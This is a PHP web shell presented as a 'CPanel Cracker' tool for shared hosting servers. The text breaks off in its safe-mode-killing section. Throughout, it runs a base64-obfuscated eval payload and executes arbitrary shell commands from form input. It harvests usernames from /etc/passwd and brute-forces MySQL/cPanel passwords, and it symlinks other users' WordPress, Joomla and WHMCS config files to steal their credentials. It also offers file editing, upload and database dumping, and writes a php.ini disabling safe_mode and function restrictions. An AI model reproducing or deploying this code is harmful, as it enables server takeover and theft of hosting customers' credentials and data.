KrimOu CPanel Cracker Script & Root Server

1. <html>
2. <title>KrimOu CPanel Cracker Script & Root Server...|</title>
3. <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
4. <link rel="stylesheet" href="http://www.w32.info/2001/04/xmldsigmore">
5.  
6. <?php
7. /*
8. 1962Cracker Coded By Akram Stelle (Dz Mafia Team)
9. */
10. @set_time_limit(0);
11. @error_reporting(0);
12.  
13.  
14. echo '<head>
15.  
16. <style type="text/css">
17. body {
18. background-color:#000000;
19. background-image:url("http://im50.gulfup.com/xbcqHf.png");
20. background-repeat:repeat;
21. margin-top:20px;
22. font-family:"Agency FB";
23. font-size:12pt; color:#ffffff;
24. }
25. input,textarea,select{
26. font-weight: bold;
27. color: #cccccc;
28. dashed #ffffff;
29. border: 1px
30. solid #2C2C2C;
31. background-color: #080808
32. }
33. a {
34. background-color: #151515;
35. vertical-align: bottom;
36. color: #000;
37. text-decoration: none;
38. font-size: 20px;
39. margin: 8px;
40. padding: 6px;
41. border: thin solid #000;
42. }
43. a:hover {
44. background-color: #080808;
45. vertical-align: bottom;
46. color: #333;
47. text-decoration: none;
48. font-size: 20px;
49. margin: 8px;
50. padding: 6px;
51. border: thin solid green;
52. }
53. .style1 {
54. text-align: center;
55. color: Green;
56. }
57. .style2 {
58. color: Green;
59. font-weight: bold;
60. }
61. .style3 {
62. color: Green;
63. }
64. -->
65. </style>
66.  
67. </head>
68. ';
69.  
70. $Getconfig = "JHZpc2l0YyA9ICRfQ09PS0lFWyJ2aXNpdHMiXTsNCmlmICgkdmlzaXRjID09ICIiKSB7DQogICR2aXNpdGMgID0gMDsNCiAgJHZpc2l0b3IgPSAkX1NFUlZFUlsiUkVNT1RFX0FERFIiXTsNCiAgJHdlYiAgICAgPSAkX1NFUlZFUlsiSFRUUF9IT1NUIl07DQogICRpbmogICAgID0gJF9TRVJWRVJbIlJFUVVFU1RfVVJJIl07DQogICR0YXJnZXQgID0gcmF3dXJsZGVjb2RlKCR3ZWIuJGluaik7DQp9DQplbHNlIHsgJHZpc2l0YysrOyB9DQpAc2V0Y29va2llKCJ2aXNpdHoiLCR2aXNpdGMpOw==";
71. eval(base64_decode($Getconfig));
72.  
73. function in($type,$name,$size,$value,$checked=0)
74. {
75. $ret = "<input type=".$type." name=".$name." "; if($size != 0)
76. {
77. $ret .= "size=".$size." "; }
78. $ret .= "value=\"".$value."\""; if($checked) $ret .= " checked"; return $ret.">"; }
79.  
80. class my_sql
81. {
82. var $host = 'localhost'; var $port = ''; var $user = ''; var $pass = ''; var $base = ''; var $db = ''; var $connection; var $res; var $error; var $rows; var $columns; var $num_rows; var $num_fields; var $dump; function connect()
83. {
84. switch($this->db)
85. {
86. case 'MySQL': if(empty($this->port))
87. {
88. $this->port = '3306'; }
89. if(!function_exists('mysql_connect')) return 0; $this->connection = @mysql_connect($this->host.':'.$this->port,$this->user,$this->pass); if(is_resource($this->connection)) return 1; $this->error = @mysql_errno()." : ".@mysql_error(); break; case 'MSSQL': if(empty($this->port))
90. {
91. $this->port = '1433'; }
92. if(!function_exists('mssql_connect')) return 0; $this->connection = @mssql_connect($this->host.','.$this->port,$this->user,$this->pass); if($this->connection) return 1; $this->error = "Can't connect to server"; break; case 'PostgreSQL': if(empty($this->port))
93. {
94. $this->port = '5432'; }
95. $str = "host='".$this->host."' port='".$this->port."' user='".$this->user."' password='".$this->pass."' dbname='".$this->base."'"; if(!function_exists('pg_connect')) return 0; $this->connection = @pg_connect($str); if(is_resource($this->connection)) return 1; $this->error = @pg_last_error($this->connection); break; case 'Oracle': if(!function_exists('ocilogon')) return 0; $this->connection = @ocilogon($this->user, $this->pass, $this->base); if(is_resource($this->connection)) return 1; $error = @ocierror(); $this->error=$error['message']; break; }
96. return 0; }
97. function select_db()
98. {
99. switch($this->db)
100. {
101. case 'MySQL': if(@mysql_select_db($this->base,$this->connection)) return 1; $this->error = @mysql_errno()." : ".@mysql_error(); break; case 'MSSQL': if(@mssql_select_db($this->base,$this->connection)) return 1; $this->error = "Can't select database"; break; case 'PostgreSQL': return 1; break; case 'Oracle': return 1; break; }
102. return 0; }
103. function query($query)
104. {
105. $this->res=$this->error=''; switch($this->db)
106. {
107. case 'MySQL': if(false===($this->res=@mysql_query('/*'.chr(0).'*/'.$query,$this->connection)))
108. {
109. $this->error = @mysql_error($this->connection); return 0; }
110. else if(is_resource($this->res))
111. {
112. return 1; }
113. return 2; break; case 'MSSQL': if(false===($this->res=@mssql_query($query,$this->connection)))
114. {
115. $this->error = 'Query error'; return 0; }
116. else if(@mssql_num_rows($this->res) > 0)
117. {
118. return 1; }
119. return 2; break; case 'PostgreSQL': if(false===($this->res=@pg_query($this->connection,$query)))
120. {
121. $this->error = @pg_last_error($this->connection); return 0; }
122. else if(@pg_num_rows($this->res) > 0)
123. {
124. return 1; }
125. return 2; break; case 'Oracle': if(false===($this->res=@ociparse($this->connection,$query)))
126. {
127. $this->error = 'Query parse error'; }
128. else
129. {
130. if(@ociexecute($this->res))
131. {
132. if(@ocirowcount($this->res) != 0) return 2; return 1; }
133. $error = @ocierror(); $this->error=$error['message']; }
134. break; }
135. return 0; }
136. function get_result()
137. {
138. $this->rows=array(); $this->columns=array(); $this->num_rows=$this->num_fields=0; switch($this->db)
139. {
140. case 'MySQL': $this->num_rows=@mysql_num_rows($this->res); $this->num_fields=@mysql_num_fields($this->res); while(false !== ($this->rows[] = @mysql_fetch_assoc($this->res))); @mysql_free_result($this->res); if($this->num_rows)
141. {
142. $this->columns = @array_keys($this->rows[0]); return 1;}
143. break; case 'MSSQL': $this->num_rows=@mssql_num_rows($this->res); $this->num_fields=@mssql_num_fields($this->res); while(false !== ($this->rows[] = @mssql_fetch_assoc($this->res))); @mssql_free_result($this->res); if($this->num_rows)
144. {
145. $this->columns = @array_keys($this->rows[0]); return 1;}
146. ; break; case 'PostgreSQL': $this->num_rows=@pg_num_rows($this->res); $this->num_fields=@pg_num_fields($this->res); while(false !== ($this->rows[] = @pg_fetch_assoc($this->res))); @pg_free_result($this->res); if($this->num_rows)
147. {
148. $this->columns = @array_keys($this->rows[0]); return 1;}
149. break; case 'Oracle': $this->num_fields=@ocinumcols($this->res); while(false !== ($this->rows[] = @oci_fetch_assoc($this->res))) $this->num_rows++; @ocifreestatement($this->res); if($this->num_rows)
150. {
151. $this->columns = @array_keys($this->rows[0]); return 1;}
152. break; }
153. return 0; }
154. function dump($table)
155. {
156. if(empty($table)) return 0; $this->dump=array(); $this->dump[0] = '##'; $this->dump[1] = '## --------------------------------------- '; $this->dump[2] = '## Created: '.date ("d/m/Y H:i:s"); $this->dump[3] = '## Database: '.$this->base; $this->dump[4] = '## Table: '.$table; $this->dump[5] = '## --------------------------------------- '; switch($this->db)
157. {
158. case 'MySQL': $this->dump[0] = '## MySQL dump'; if($this->query('/*'.chr(0).'*/ SHOW CREATE TABLE `'.$table.'`')!=1) return 0; if(!$this->get_result()) return 0; $this->dump[] = $this->rows[0]['Create Table'].";"; $this->dump[] = '## --------------------------------------- '; if($this->query('/*'.chr(0).'*/ SELECT * FROM `'.$table.'`')!=1) return 0; if(!$this->get_result()) return 0; for($i=0;$i<$this->num_rows;$i++)
159. {
160. foreach($this->rows[$i] as $k=>$v)
161. {
162. $this->rows[$i][$k] = @mysql_real_escape_string($v);}
163. $this->dump[] = 'INSERT INTO `'.$table.'` (`'.@implode("`, `", $this->columns).'`) VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; }
164. break; case 'MSSQL': $this->dump[0] = '## MSSQL dump'; if($this->query('SELECT * FROM '.$table)!=1) return 0; if(!$this->get_result()) return 0; for($i=0;$i<$this->num_rows;$i++)
165. {
166. foreach($this->rows[$i] as $k=>$v)
167. {
168. $this->rows[$i][$k] = @addslashes($v);}
169. $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; }
170. break; case 'PostgreSQL': $this->dump[0] = '## PostgreSQL dump'; if($this->query('SELECT * FROM '.$table)!=1) return 0; if(!$this->get_result()) return 0; for($i=0;$i<$this->num_rows;$i++)
171. {
172. foreach($this->rows[$i] as $k=>$v)
173. {
174. $this->rows[$i][$k] = @addslashes($v);}
175. $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; }
176. break; case 'Oracle': $this->dump[0] = '## ORACLE dump'; $this->dump[] = '## under construction'; break; default: return 0; break; }
177. return 1; }
178. function close()
179. {
180. switch($this->db)
181. {
182. case 'MySQL': @mysql_close($this->connection); break; case 'MSSQL': @mssql_close($this->connection); break; case 'PostgreSQL': @pg_close($this->connection); break; case 'Oracle': @oci_close($this->connection); break; }
183. }
184. function affected_rows()
185. {
186. switch($this->db)
187. {
188. case 'MySQL': return @mysql_affected_rows($this->res); break; case 'MSSQL': return @mssql_affected_rows($this->res); break; case 'PostgreSQL': return @pg_affected_rows($this->res); break; case 'Oracle': return @ocirowcount($this->res); break; default: return 0; break; }
189. }
190. }
191. if(!empty($_POST['cccc']) && $_POST['cccc']=="download_file" && !empty($_POST['d_name']))
192. {
193. if(!$file=@fopen($_POST['d_name'],"r"))
194. {
195. err(1,$_POST['d_name']); $_POST['cccc']=""; }
196. else
197. {
198. @ob_clean(); $filename = @basename($_POST['d_name']); $filedump = @fread($file,@filesize($_POST['d_name'])); fclose($file); $content_encoding=$mime_type=''; compress($filename,$filedump,$_POST['compress']); if (!empty($content_encoding))
199. {
200. header('Content-Encoding: ' . $content_encoding); }
201. header("Content-type: ".$mime_type); header("Content-disposition: attachment; filename=\"".$filename."\";"); echo $filedump; exit(); }
202. }
203. if(isset($_GET['phpinfo']))
204. {
205. echo @phpinfo(); echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); }
206. if (!empty($_POST['cccc']) && $_POST['cccc']=="db_query")
207. {
208. echo $head; $sql = new my_sql(); $sql->db = $_POST['db']; $sql->host = $_POST['db_server']; $sql->port = $_POST['db_port']; $sql->user = $_POST['mysql_l']; $sql->pass = $_POST['mysql_p']; $sql->base = $_POST['mysql_db']; $querys = @explode(';',$_POST['db_query']); echo '<body bgcolor=#e4e0d8>'; if(!$sql->connect()) echo "<div align=center><font face=Verdana size=-2 color=red><b>".$sql->error."</b></font></div>"; else
209. {
210. if(!empty($sql->base)&&!$sql->select_db()) echo "<div align=center><font face=Verdana size=-2 color=red><b>".$sql->error."</b></font></div>"; else
211. {
212. foreach($querys as $num=>$query)
213. {
214. if(strlen($query)>5)
215. {
216. echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query,ENT_QUOTES)."</b></font><br>"; switch($sql->query($query))
217. {
218. case '0': echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$sql->error."</b></font></td></tr></table>"; break; case '1': if($sql->get_result())
219. {
220. echo "<table width=100%>"; foreach($sql->columns as $k=>$v) $sql->columns[$k] = htmlspecialchars($v,ENT_QUOTES); $keys = @implode("&nbsp;</b></font></td><td bgcolor=#800000><font face=Verdana size=-2><b>&nbsp;", $sql->columns); echo "<tr><td bgcolor=#800000><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>"; for($i=0;$i<$sql->num_rows;$i++)
221. {
222. foreach($sql->rows[$i] as $k=>$v) $sql->rows[$i][$k] = htmlspecialchars($v,ENT_QUOTES); $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$sql->rows[$i]); echo '<tr><td><font face=Verdana size=-2>&nbsp;'.$values.'&nbsp;</font></td></tr>'; }
223. echo "</table>"; }
224. break; case '2': $ar = $sql->affected_rows()?($sql->affected_rows()):('0'); echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$ar."</b></font></td></tr></table><br>"; break; }
225. }
226. }
227. }
228. }
229. echo "<br><title>1962Cracker By Akram Stelle</title><form name=form method=POST>";
230. echo in('hidden','db',0,$_POST['db']); echo in('hidden','db_server',0,$_POST['db_server']); echo in('hidden','db_port',0,$_POST['db_port']); echo in('hidden','mysql_l',0,$_POST['mysql_l']); echo in('hidden','mysql_p',0,$_POST['mysql_p']); echo in('hidden','mysql_db',0,$_POST['mysql_db']); echo in('hidden','cccc',0,'db_query');
231. echo "<div align=center>"; echo "<font face=Verdana size=-2><b>Base: </b><input type=text name=mysql_db value=\"".$sql->base."\"></font><br>"; echo "<textarea cols=65 rows=10 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br><input type=submit name=submit value=\" Run SQL query \"></div><br><br>"; echo "</form>"; echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); }
232.  
233.  
234.  
235.  
236.  
237.  
238.  
239.  
240.  
241.  
242.  
243.  
244.  
245.  
246.  
247.  
248.  
249.  
250.  
251.  
252.  
253.  
254.  
255. function ccmmdd($ccmmdd2,$att)
256. {
257. global $ccmmdd2,$att;
258. echo '
259. <table style="width: 100%" class="style1" dir="rtl">
260. <tr>
261. <td class="style9"><strong>???H?/strong></td>
262. </tr>
263. <tr>
264. <td class="style13">
265. <form method="post">
266. <select name="att" dir="rtl" style="height: 109px" size="6">
267. ';
268. if($_POST['att']==null)
269. {
270. echo ' <option value="system" selected="">system</option>';
271. }else{
272. echo " <option value='$_POST[att]' selected=''>$_POST[att]</option>
273. <option value=system>system</option>
274. ";
275.  
276.  
277. }
278.  
279. echo '
280. <option value="passthru">passthru</option>
281. <option value="exec">exec</option>
282. <option value="shell_exec">shell_exec</option>
283. </select>
284. <input name="page" value="ccmmdd" type="hidden"><br>
285. <input dir="ltr" name="ccmmdd2" style="width: 173px" type="text" value="';if(!$_POST['ccmmdd2']){echo 'dir';}else{echo $_POST['ccmmdd2'];}echo '"><br>
286. <input type="submit" value="???>
287. </form>
288.  
289. </td>
290. </tr>
291. <tr>
292. <td class="style13">
293. ';
294.  
295. if($_POST[att]=='system')
296. {
297. echo '
298. <textarea dir="ltr" name="TextArea1" style="width: 745px; height: 204px">';
299. system($_POST['ccmmdd2']);
300. echo ' </textarea>';
301.  
302.  
303. }
304.  
305. if($_POST[att]=='passthru')
306. {
307. echo '
308. <textarea dir="ltr" name="TextArea1" style="width: 745px; height: 204px">';
309. passthru($_POST['ccmmdd2']);
310. echo ' </textarea>';
311.  
312.  
313. }
314.  
315.  
316.  
317.  
318.  
319. if($_POST[att]=='exec')
320. {
321.  
322. echo ' <textarea dir="ltr" name="TextArea1" style="width: 745px; height: 204px">';
323. exec($_POST['ccmmdd2'],$res);
324. echo $res = join("\n",$res);
325. echo ' </textarea>';
326.  
327.  
328. }
329.  
330.  
331.  
332.  
333.  
334.  
335.  
336. if($_POST[att]=='shell_exec')
337. {
338.  
339. echo ' <textarea dir="ltr" name="TextArea1" style="width: 745px; height: 204px">';
340. echo shell_exec($_POST['ccmmdd2']);
341. echo ' </textarea>';
342.  
343.  
344. }
345. echo '
346. </td>
347. </tr>
348. </table>
349. ';
350.  
351. exit;
352. }
353.  
354. if($_POST['page']=='edit')
355. {
356.  
357. $code=@str_replace("\r\n","\n",$_POST['code']);
358. $code=@str_replace('\\','',$code);
359. $fp = fopen($pathclass, 'w');
360. fwrite($fp,"$code");
361. fclose($fp);
362. echo "<center><b>OK Edit<br><br><br><br><a href=".$_SERVER['PHP_SELF'].">BACK</a>";
363. exit;
364. }
365.  
366.  
367.  
368.  
369.  
370.  
371.  
372. if($_POST['page']=='show')
373. {
374. $pathclass =$_POST['pathclass'];
375. echo '
376. <form method="POST">
377. <input type="hidden" name="page" value="edit">
378. ';
379.  
380. $sahacker = fopen($pathclass, "rb");
381. echo '<center>'.$pathclass.'<br><textarea dir="ltr" name="code" style="width: 845px; height: 404px">';
382. $code = fread($sahacker, filesize($pathclass));
383. echo $code =htmlspecialchars($code);
384. echo '</textarea>';
385. fclose($sahacker);
386. echo '
387. <br><input type="text" name="pathclass" value="'.$pathclass.'" style="width: 445px;">
388. <br><strong><input type="submit" value="edit file">
389. </form>
390. ';
391. exit;
392. }
393.  
394.  
395.  
396.  
397. if($_POST['page']=='ccmmdd')
398. {
399. echo ccmmdd($ccmmdd2,$att);
400. exit;
401. }
402.  
403.  
404.  
405.  
406.  
407.  
408.  
409.  
410.  
411.  
412.  
413.  
414.  
415.  
416.  
417.  
418.  
419.  
420.  
421.  
422.  
423.  
424.  
425.  
426. if($_POST['page']=='find')
427. {
428. if(isset($_POST['usernames']) && isset($_POST['passwords']))
429. {
430. if($_POST['type'] == 'passwd'){
431. $e = explode("\n",$_POST['usernames']);
432. foreach($e as $value){
433. $k = explode(":",$value);
434. $username .= $k['0']." ";
435. }
436. }elseif($_POST['type'] == 'simple'){
437. $username = str_replace("\n",' ',$_POST['usernames']);
438. }
439. $a1 = explode(" ",$username);
440. $a2 = explode("\n",$_POST['passwords']);
441. $id2 = count($a2);
442. $ok = 0;
443. foreach($a1 as $user )
444. {
445. if($user !== '')
446. {
447. $user=trim($user);
448. for($i=0;$i<=$id2;$i++)
449. {
450. $pass = trim($a2[$i]);
451. if(@mysql_connect('localhost',$user,$pass))
452. {
453. echo "1962Cracker~ user is ==> (<b><font color=green>$user</font></b>) Password is ==> (<b><font color=red>$pass</font></b>)<br />";
454. $ok++;
455. }
456. }
457. }
458. }
459. echo "<hr><b>You Found <font color=green>$ok</font> cPanel (1962Cracker)</b>";
460. echo "<center><b><a href=".$_SERVER['PHP_SELF']."><~ BACK</a>";
461. exit;
462. }
463. }
464.  
465.  
466. ?>
467.  
468. <table width="100%" cellspacing="0" cellpadding="0" class="tb1" >
469.  
470.  
471. <td height="10" align="left" class="td1"></td></tr><tr><td
472. width="100%" align="center" valign="top" rowspan="1"><font
473. color="red" face="comic sans ms"size="1"><b>
474. <font color=#ff9933>
475. </font><br><font color=white>--==[[Greetz to]]==--</font><br><font color=#ff9933>-=| My Gril :3|=-<br>
476.  
477. </table>
478. </table> <div align=center><font color=#ff9933 font size=5><marquee behavior="scroll" direction="left" scrollamount="2" scrolldelay="30" width="70%">
479.  
480. <span class="footerlink"> ####### Coded By KrimOu #######</span>
481.  
482. </marquee><br></font></div><div align=center><table width=50%>
483.  
484. <form method="POST" target="_blank">
485. <strong>
486. <input name="page" type="hidden" value="find">
487. </strong>
488. <table width="600" border="0" cellpadding="3" cellspacing="1" align="center">
489. <tr>
490. <td valign="top" bgcolor="#151515"><center><strong><img src="http://im58.gulfup.com/Ufq2FO.jpg" /><br>
491. </strong>
492. <a href="https://www.facebook.com/krimoudz07" class="style2"><strong>KrimOu CPanelCracker Script</strong></a></center></td>
493. </tr>
494. <tr>
495. <td>
496. <table width="100%" border="0" cellpadding="3" cellspacing="1" align="center">
497. <td valign="top" bgcolor="#151515" class="style2" style="width: 139px">
498. <strong>User :</strong></td>
499. <td valign="top" bgcolor="#151515" colspan="5"><strong><textarea cols="40" rows="10" name="usernames"></textarea></strong></td>
500. </tr>
501. <tr>
502. <td valign="top" bgcolor="#151515" class="style2" style="width: 139px">
503. <strong>Pass :</strong></td>
504. <td valign="top" bgcolor="#151515" colspan="5"><strong><textarea cols="40" rows="10" name="passwords"></textarea></strong></td>
505. </tr>
506.  
507. <tr>
508. <td valign="top" bgcolor="#151515" class="style2" style="width: 139px">
509. <strong>Type :</strong></td>
510. <td valign="top" bgcolor="#151515" colspan="5">
511. <span class="style2"><strong>Simple : </strong> </span>
512. <strong>
513. <input type="radio" name="type" value="simple" checked="checked" class="style3"></strong>
514. <font class="style2"><strong>/etc/passwd : </strong> </font>
515. <strong>
516. <input type="radio" name="type" value="passwd" class="style3"></strong><span class="style3"><strong>
517. </span>
518. </td>
519. </tr>
520. <tr>
521. <td valign="top" bgcolor="#151515" style="width: 139px"></td>
522. <td valign="top" bgcolor="#151515" colspan="5"><strong><input type="submit" value="start">
523.  
524. </td>
525. <tr>
526. </form>
527.  
528. <tr>
529. <td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>Config Zone</strong></td>
530. </tr>
531. <tr>
532. <td valign="top" bgcolor="#151515" style="width: 139px"><strong>Get User & Config</strong></td>
533. <td valign="top" bgcolor="#151515" colspan="5">
534. <strong>
535. <form method=post>
536. <input type=submit name="usre" value="Get Usernames & Config !" /></form>
537.  
538.  
539.  
540.  
541. <?php
542. if(isset($_POST['usre'])){
543. ?><form method=post>
544. <textarea rows=10 cols=30 name=user><?php $users=file("/etc/passwd");
545. foreach($users as $user)
546. {
547. $str=explode(":",$user);
548. echo $str[0]."\n";
549. }
550.  
551. ?></textarea><br><br>
552. <input type=submit name=su value=" Get Configuration Files :)" /></form>
553. <?php } ?>
554. <?php
555. error_reporting(0);
556. echo "<font color=red size=2 face=\"comic sans ms\">";
557. if(isset($_POST['su']))
558. {
559.  
560. $dir=mkdir('dzmafia',0777);
561. $r = " Options all \n DirectoryIndex dz.html \n Require None \n Satisfy Any";
562. $f = fopen('dzmafia/.htaccess','w');
563.  
564. fwrite($f,$r);
565. $consym="<a href=dzmafia/><font color=white size=3 face=\"comic sans ms\">configuration files</font></a>";
566. echo "<br>folder where config files has been symlinked By The 1962 Script Coded By Akram Stelle (Dz Mafia Team)<br><u><font color=red size=2 face=\"comic sans ms\">$consym</font></u>";
567.  
568. $usr=explode("\n",$_POST['user']);
569.  
570. foreach($usr as $uss )
571. {
572. $us=trim($uss);
573.  
574. $r="dzmafia/";
575. symlink('/home/'.$us.'/public_html/wp-config.php',$r.$us.'..wp-config');
576. symlink('/home/'.$us.'/public_html/wordpress/wp-config.php',$r.$us.'..word-wp');
577. symlink('/home/'.$us.'/public_html/blog/wp-config.php',$r.$us.'..wpblog');
578. symlink('/home/'.$us.'/public_html/configuration.php',$r.$us.'..joomla-or-whmcs');
579. symlink('/home/'.$us.'/public_html/joomla/configuration.php',$r.$us.'..joomla');
580. symlink('/home/'.$us.'/public_html/vb/includes/config.php',$r.$us.'..vbinc');
581. symlink('/home/'.$us.'/public_html/includes/config.php',$r.$us.'..vb');
582. symlink('/home/'.$us.'/public_html/conf_global.php',$r.$us.'..conf_global');
583. symlink('/home/'.$us.'/public_html/inc/config.php',$r.$us.'..inc');
584. symlink('/home/'.$us.'/public_html/config.php',$r.$us.'..config');
585. symlink('/home/'.$us.'/public_html/Settings.php',$r.$us.'..Settings');
586. symlink('/home/'.$us.'/public_html/sites/default/settings.php',$r.$us.'..sites');
587. symlink('/home/'.$us.'/public_html/whm/configuration.php',$r.$us.'..whm');
588. symlink('/home/'.$us.'/public_html/whmcs/configuration.php',$r.$us.'..whmcs');
589. symlink('/home/'.$us.'/public_html/support/configuration.php',$r.$us.'..supporwhmcs');
590. symlink('/home/'.$us.'/public_html/whmc/WHM/configuration.php',$r.$us.'..WHM');
591. symlink('/home/'.$us.'/public_html/whm/WHMCS/configuration.php',$r.$us.'..whmc');
592. symlink('/home/'.$us.'/public_html/whm/whmcs/configuration.php',$r.$us.'..WHMcs');
593. symlink('/home/'.$us.'/public_html/support/configuration.php',$r.$us.'..whmcsupp');
594. symlink('/home/'.$us.'/public_html/clients/configuration.php',$r.$us.'..whmcs-cli');
595. symlink('/home/'.$us.'/public_html/client/configuration.php',$r.$us.'..whmcs-cl');
596. symlink('/home/'.$us.'/public_html/clientes/configuration.php',$r.$us.'..whmcs-CL');
597. symlink('/home/'.$us.'/public_html/cliente/configuration.php',$r.$us.'..whmcs-Cl');
598. symlink('/home/'.$us.'/public_html/clientsupport/configuration.php',$r.$us.'..whmcs-csup');
599. symlink('/home/'.$us.'/public_html/billing/configuration.php',$r.$us.'..whmcs-bill');
600. symlink('/home/'.$us.'/public_html/admin/config.php',$r.$us.'..admin-conf');
601. }
602. }
603. ?>
604.  
605. </tr>
606.  
607. <td valign="top" colspan="6"><strong></strong></td>
608.  
609. <form method="POST" target="_blank">
610. <strong>
611. <input type="hidden" name="go" value="cmd_mysql">
612. </strong>
613. <tr>
614. <td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>CMD MYSQL</strong></td>
615. </tr>
616. <tr>
617. <td valign="top" bgcolor="#151515" style="width: 139px"><strong>user</strong></td>
618. <td valign="top" bgcolor="#151515"><strong><input name="mysql_l" type="text"></strong></td>
619. <td valign="top" bgcolor="#151515"><strong>pass</strong></td>
620. <td valign="top" bgcolor="#151515"><strong><input name="mysql_p" type="text"></strong></td>
621. <td valign="top" bgcolor="#151515"><strong>database</strong></td>
622. <td valign="top" bgcolor="#151515"><strong><input name="mysql_db" type="text"></strong></td>
623. </tr>
624. <tr>
625. <td valign="top" bgcolor="#151515" style="height: 25px; width: 139px;">
626. <strong>cmd ~</strong></td>
627. <td valign="top" bgcolor="#151515" colspan="5" style="height: 25px">
628. <strong>
629. <textarea name="db_query" style="width: 353px; height: 89px">SHOW DATABASES;
630. SHOW TABLES user_vb ;
631. SELECT * FROM user;
632. SELECT version();
633. SELECT user();</textarea></strong></td>
634. </tr>
635. <tr>
636. <td valign="top" bgcolor="#151515" style="width: 139px"><strong></strong></td>
637. <td valign="top" bgcolor="#151515" colspan="5"><strong><input type="submit" value="run"></strong></td>
638. </tr>
639. <input name="db" value="MySQL" type="hidden">
640. <input name="db_server" type="hidden" value="localhost">
641. <input name="db_port" type="hidden" value="3306">
642. <input name="cccc" type="hidden" value="db_query">
643.  
644. </form>
645. <tr>
646. <td valign="top" bgcolor="#151515" colspan="6"><strong></strong></td>
647.  
648.  
649. </tr>
650.  
651. <form method="POST" target="_blank">
652. <tr>
653. <td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>CMD
654. system - passthru - exec - shell_exec</strong></td>
655. </tr>
656. <tr>
657. <td valign="top" bgcolor="#151515" style="width: 139px"><strong>cmd ~</strong></td>
658. <td valign="top" bgcolor="#151515" colspan="5">
659. <select name="att" dir="rtl" size="1">
660. <?php
661. if($_POST['att']==null)
662. {
663. echo ' <option value="system" selected="">system</option>';
664. }else{
665. echo " <option value='$_POST[att]' selected=''>$_POST[att]</option>
666. <option value=system>system</option>
667. ";
668.  
669.  
670. }
671. ?>
672.  
673. <option value="passthru">passthru</option>
674. <option value="exec">exec</option>
675. <option value="shell_exec">shell_exec</option>
676. </select>
677. <strong>
678. <input name="page" type="hidden" value="ccmmdd">
679. <input name="ccmmdd2" type="text" style="width: 284px" value="ls -la"></strong></td>
680. </tr>
681. <tr>
682. <td valign="top" bgcolor="#151515" style="width: 139px"><strong></strong></td>
683. <td valign="top" bgcolor="#151515" colspan="5"><strong><input type="submit" value="Go"></strong></td>
684. </tr>
685. </form>
686.  
687. <form method="POST" target="_blank">
688.  
689. <tr>
690. <td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>Show
691. File And Edit</strong></td>
692. </tr>
693. <tr>
694. <td valign="top" bgcolor="#151515" style="width: 139px"><strong>Path ~</strong></td>
695. <td valign="top" bgcolor="#151515" colspan="5">
696. <strong>
697. <input name="pathclass" type="text" style="width: 284px" value="<?php echo realpath('')?>"></strong></td>
698. </tr>
699. <tr>
700. <td valign="top" bgcolor="#151515" style="width: 139px"><strong></strong></td>
701. <td valign="top" bgcolor="#151515" colspan="5"><strong><input type="submit" value="show"></strong></td>
702. </tr>
703. <input name="page" type="hidden" value="show">
704. </form>
705.  
706. <tr>
707. <td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>Tools</strong></td>
708. </tr>
709. <tr>
710. <td valign="top" bgcolor="#151515" style="width: 139px"><strong>Upload</strong></td>
711. <td valign="top" bgcolor="#151515" colspan="5">
712. <strong>
713. <?php
714. echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
715. echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
716. if( $_POST['_upl'] == "Upload" ) {
717. if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload SUCSES :) !!!</b><br><br>'; }
718. else { echo '<b>Upload Failed :( !!!</b><br><br>'; }
719. }
720. ?>
721. <tr>
722. <td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>Server Info</strong></td>
723. </tr>
724. <tr>
725. <td valign="top" bgcolor="#151515" style="width: 139px"><strong>Safe Mode</strong></td>
726. <td valign="top" bgcolor="#151515" colspan="5">
727. <strong>
728. <?php
729. $safe_mode = ini_get('safe_mode');
730. if($safe_mode=='1')
731. {
732. echo 'ON';
733. }else{
734. echo 'OFF';
735. }
736.  
737. ?>
738. </strong>
739. </td>
740. </tr>
741.  
742. <tr>
743. <td valign="top" bgcolor="#151515" style="width: 139px"><strong>Uname</strong></td>
744. <td valign="top" bgcolor="#151515" colspan="5">
745. <?php
746. echo '<b><br>'.php_uname().'<br></b>';
747. ?>
748. </tr>
749. </td>
750.  
751. <td valign="top" bgcolor="#151515" style="width: 139px"><strong>Kill Safe Mode</strong></td>
752. <td valign="top" bgcolor="#151515" colspan="5">
753. <strong>
754.  
755. <?php
756. echo "<right>";
757. echo"<FORM method='POST' action='$REQUEST_URI' enctype='multipart/form-data'>
758. <p align='center'>
759. <INPUT type='submit' name='Kill' value='if Safe Mode is On Clic Here To Kill The SafeMode [ini.php] [php.ini] [.htaccess]' id=input style='font-size: 12pt; font-weight: bold; border-style: inset; border-width: 1px'></p>
760. </form>
761. ";
762. echo "<right/>";
763. if (empty($_POST['Kill'] ) ) {
764. }ELSE{
765. $action = '?action=Kill';
766. echo "<html>
767. <br>
768. <head>
769. <meta http-equiv='pragma' content='no-cache'>
770. </head><body>";
771.  
772. $fp = fopen("php.ini","w+");
773. fwrite($fp,"safe_mode = Off
774. disable_functions = NONE
775. open_basedir = OFF ");
